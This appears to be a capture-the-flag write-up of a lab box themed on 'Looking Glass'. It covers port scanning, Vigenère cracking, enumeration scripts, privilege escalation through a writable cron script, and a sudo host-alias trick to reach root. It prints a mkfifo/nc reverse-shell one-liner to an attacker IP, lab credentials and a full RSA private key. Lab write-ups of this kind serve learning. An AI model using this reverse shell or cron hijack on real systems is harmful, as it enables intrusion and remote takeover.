rustscan 1 rustscan -a 10.10.66.116 > rustscan.txt
The scan take lot of time, that’s why I’m using rustscan.
SSH 1 ssh 10.10.66.116 -p 9000 -o HostKeyAlgorithms=+ssh-rsa
And when I go too much lower I need to go HIger
Find the right port I foun the right port
1 ssh 10.10.66.116 -o HostKeyAlgorithms=+ssh-rsa -p 9955
Break the chipher https://www.guballa.de/vigenere-solver It’s the ciper vigenere, let’s break it.
A password : bewareTheJabberwock Now we can enter the the password in the ssh connection. SSH accountjabberwock:GettingAppearedNoddedRider
SSH
I’m in.
User FLAG
Enum I’m downloading both, if I found nothing with lse I will try with linpeas.
1 2 3 4 wget http://10.8.50.167:8000/lse.sh wget http://10.8.50.167:8000/linpeas.sh chmod +x *./lse.sh
Output:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 [!] sud010 Can we list sudo commands without a password?................... yes! --- Matching Defaults entries for jabberwock on looking-glass: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User jabberwock may run the following commands on looking-glass: (root) NOPASSWD: /sbin/reboot --- [!] ret060 Can we write to executable paths present in cron jobs........... yes! --- /etc/crontab:@reboot tweedledum bash /home/jabberwock/twasBrillig.sh ---
Privesc We launch the script with the user tweedledum.@reboot tweedledum bash /home/jabberwock/twasBrillig.sh I can edit this file so I will add a revershell.
1 2 3 4 5 6 7 jabberwock@looking-glass:/etc$ cat crontab wall $(cat /home/jabberwock/poem.txt) rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.50.167 4949 >/tmp/f
Listen then reboot with sudo. On your machine.
On his machine.
Get the shell
hulptydumpty.txt 1 2 3 4 5 6 7 8 dcfff5eb40423f055a4cd0a8d7ed39ff6cb9816868f5766b4088b9e9906961b9 7692c3ad3540bb803c020b3aee66cd8887123234ea0c6e7143c0add73ff431ed 28391d3bc64ec15cbb090426b04aa6b7649c3cc85f11230bb0105e02d15e3624 b808e156d18d1cecdcc1456375f8cae994c36549a07c8c2315b473dd9d7f404f fa51fd49abf67705d6a35d18218c115ff5633aec1f9ebfdc9d5d4956416f57f6 b9776d7ddf459c9ad5b0e1d6ac61e27befb5e99fd62446677600d7cacef544d0 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8 7468652070617373776f7264206973207a797877767574737271706f6e6d6c6b
Decode it:https://www.dcode.fr/file-data
zyxwvutsrqponmlk
Can’t ssh into humptydumpty but I can use su.
Alice We can’t list the directory but we still can read te specifics files.humptydumpty@looking-glass:/home/alice/.ssh$ cat id_rsa
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 -----BEGIN RSA PRIVATE KEY----- MIIEpgIBAAKCAQEAxmPncAXisNjbU2xizft4aYPqmfXm1735FPlGf4j9ExZhlmmD NIRchPaFUqJXQZi5ryQH6YxZP5IIJXENK+a4WoRDyPoyGK/63rXTn/IWWKQka9tQ 2xrdnyxdwbtiKP1L4bq/4vU3OUcA+aYHxqhyq39arpeceHVit+jVPriHiCA73k7g HCgpkwWczNa5MMGo+1Cg4ifzffv4uhPkxBLLl3f4rBf84RmuKEEy6bYZ+/WOEgHl fks5ngFniW7x2R3vyq7xyDrwiXEjfW4yYe+kLiGZyyk1ia7HGhNKpIRufPdJdT+r NGrjYFLjhzeWYBmHx7JkhkEUFIVx6ZV1y+gihQIDAQABAoIBAQDAhIA5kCyMqtQj X2F+O9J8qjvFzf+GSl7lAIVuC5Ryqlxm5tsg4nUZvlRgfRMpn7hJAjD/bWfKLb7j /pHmkU1C4WkaJdjpZhSPfGjxpK4UtKx3Uetjw+1eomIVNu6pkivJ0DyXVJiTZ5jF ql2PZTVpwPtRw+RebKMwjqwo4k77Q30r8Kxr4UfX2hLHtHT8tsjqBUWrb/jlMHQO zmU73tuPVQSESgeUP2jOlv7q5toEYieoA+7ULpGDwDn8PxQjCF/2QUa2jFalixsK WfEcmTnIQDyOFWCbmgOvik4Lzk/rDGn9VjcYFxOpuj3XH2l8QDQ+GO+5BBg38+aJ cUINwh4BAoGBAPdctuVRoAkFpyEofZxQFqPqw3LZyviKena/HyWLxXWHxG6ji7aW DmtVXjjQOwcjOLuDkT4QQvCJVrGbdBVGOFLoWZzLpYGJchxmlR+RHCb40pZjBgr5 8bjJlQcp6pplBRCF/OsG5ugpCiJsS6uA6CWWXe6WC7r7V94r5wzzJpWBAoGBAM1R aCg1/2UxIOqxtAfQ+WDxqQQuq3szvrhep22McIUe83dh+hUibaPqR1nYy1sAAhgy wJohLchlq4E1LhUmTZZquBwviU73fNRbID5pfn4LKL6/yiF/GWd+Zv+t9n9DDWKi WgT9aG7N+TP/yimYniR2ePu/xKIjWX/uSs3rSLcFAoGBAOxvcFpM5Pz6rD8jZrzs SFexY9P5nOpn4ppyICFRMhIfDYD7TeXeFDY/yOnhDyrJXcbOARwjivhDLdxhzFkx X1DPyif292GTsMC4xL0BhLkziIY6bGI9efC4rXvFcvrUqDyc9ZzoYflykL9KaCGr +zlCOtJ8FQZKjDhOGnDkUPMBAoGBAMrVaXiQH8bwSfyRobE3GaZUFw0yreYAsKGj oPPwkhhxA0UlXdITOQ1+HQ79xagY0fjl6rBZpska59u1ldj/BhdbRpdRvuxsQr3n aGs//N64V4BaKG3/CjHcBhUA30vKCicvDI9xaQJOKardP/Ln+xM6lzrdsHwdQAXK e8wCbMuhAoGBAOKy5OnaHwB8PcFcX68srFLX4W20NN6cFp12cU2QJy2MLGoFYBpa dLnK/rW4O0JxgqIV69MjDsfRn1gZNhTTAyNnRMH1U7kUfPUB2ZXCmnCGLhAGEbY9 k6ywCnCtTz2/sNEgNcx9/iZW+yVEm/4s9eonVimF+u19HJFOPJsAYxx0 -----END RSA PRIVATE KEY-----
SHH to alice
I’m connected.
Sudoers https://wiki-tech.io/Linux/D%C3%A9butant/Sudo it’s in frech but it’s an host alias.
1 sudo -h ssalg-gnikool /bin/bash
I’m root.